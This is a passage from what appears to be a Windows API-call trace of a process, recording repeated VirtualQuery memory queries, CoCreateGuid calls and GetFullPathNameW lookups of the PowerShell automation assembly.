lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.078] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.078] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.079] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.079] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.079] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.079] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.079] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.080] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.080] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.080] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.080] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.081] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xa34ea10d, Data2=0xac8f, Data3=0x4dd4, Data4=([0]=0xba, [1]=0xd1, [2]=0x7a, [3]=0x15, [4]=0x36, [5]=0xdf, [6]=0x85, [7]=0x75))) returned 0x0 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.082] VirtualQuery (in: lpAddress=0x1ab3c0, lpBuffer=0x1ac280, dwLength=0x30 | out: lpBuffer=0x1ac280*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.083] VirtualQuery (in: lpAddress=0x1ab450, lpBuffer=0x1ac310, dwLength=0x30 | out: lpBuffer=0x1ac310*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.083] VirtualQuery (in: lpAddress=0x1ab670, lpBuffer=0x1ac530, dwLength=0x30 | out: lpBuffer=0x1ac530*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.083] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xf7215026, Data2=0x2cae, Data3=0x4bd9, Data4=([0]=0x90, [1]=0xf5, [2]=0x3f, [3]=0x2b, [4]=0x27, [5]=0xe8, [6]=0xd, [7]=0x52))) returned 0x0 [0074.084] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe39b24c1, Data2=0x6844, Data3=0x4069, Data4=([0]=0x9e, [1]=0xa3, [2]=0x76, [3]=0x8, [4]=0x16, [5]=0x6a, [6]=0xba, [7]=0xb6))) returned 0x0 [0074.084] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x24679867, Data2=0xdd, Data3=0x49b5, Data4=([0]=0xba, [1]=0x9f, [2]=0xfc, [3]=0x3, [4]=0x45, [5]=0x3d, [6]=0xcf, [7]=0x27))) returned 0x0 [0074.085] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x5dc5f405, Data2=0x957, Data3=0x4247, Data4=([0]=0xa3, [1]=0x29, [2]=0x31, [3]=0x36, [4]=0x77, [5]=0x93, [6]=0x14, [7]=0x40))) returned 0x0 [0074.085] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x947aeb44, Data2=0xd854, Data3=0x462b, Data4=([0]=0xa4, [1]=0xf2, [2]=0xdb, [3]=0x44, [4]=0xbc, [5]=0xd9, [6]=0x47, [7]=0x7b))) returned 0x0 [0074.085] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1876c606, Data2=0x53f, Data3=0x45c0, Data4=([0]=0xa7, [1]=0x66, [2]=0xce, [3]=0x26, [4]=0x3f, [5]=0xb8, [6]=0x28, [7]=0xd9))) returned 0x0 [0074.086] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8f978a4f, Data2=0xb205, Data3=0x419e, Data4=([0]=0xab, [1]=0xb6, [2]=0xb3, [3]=0x97, [4]=0xf6, [5]=0xe4, [6]=0x6e, [7]=0x1f))) returned 0x0 [0074.086] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe0e10ac6, Data2=0xb198, Data3=0x4750, Data4=([0]=0xa4, [1]=0xe5, [2]=0x3, [3]=0x49, [4]=0xdb, [5]=0xec, [6]=0x24, [7]=0x77))) returned 0x0 [0074.086] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.086] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.087] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.087] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.087] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.087] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.087] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.088] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.088] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.088] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.088] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.089] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.089] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.089] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.089] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.090] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.090] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.090] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.090] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.090] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.091] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x97d2a428, Data2=0xb5da, Data3=0x4db7, Data4=([0]=0xba, [1]=0xb0, [2]=0xe6, [3]=0xa9, [4]=0x87, [5]=0x76, [6]=0x77, [7]=0xe7))) returned 0x0 [0074.091] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.091] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.091] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.092] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.092] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.092] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.092] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.092] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.093] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.093] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.093] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.093] VirtualQuery (in: lpAddress=0x1abb40, lpBuffer=0x1aca00, dwLength=0x30 | out: lpBuffer=0x1aca00*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.094] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.094] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.094] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.094] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.095] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.095] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.095] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.095] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.095] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xd5ce6a76, Data2=0x3f89, Data3=0x4d95, Data4=([0]=0xa1, [1]=0x1a, [2]=0xc7, [3]=0x93, [4]=0x4a, [5]=0x49, [6]=0x33, [7]=0xb3))) returned 0x0 [0074.096] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.096] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.096] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.096] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.096] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.097] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.097] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.097] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.097] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.098] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.098] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.098] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, 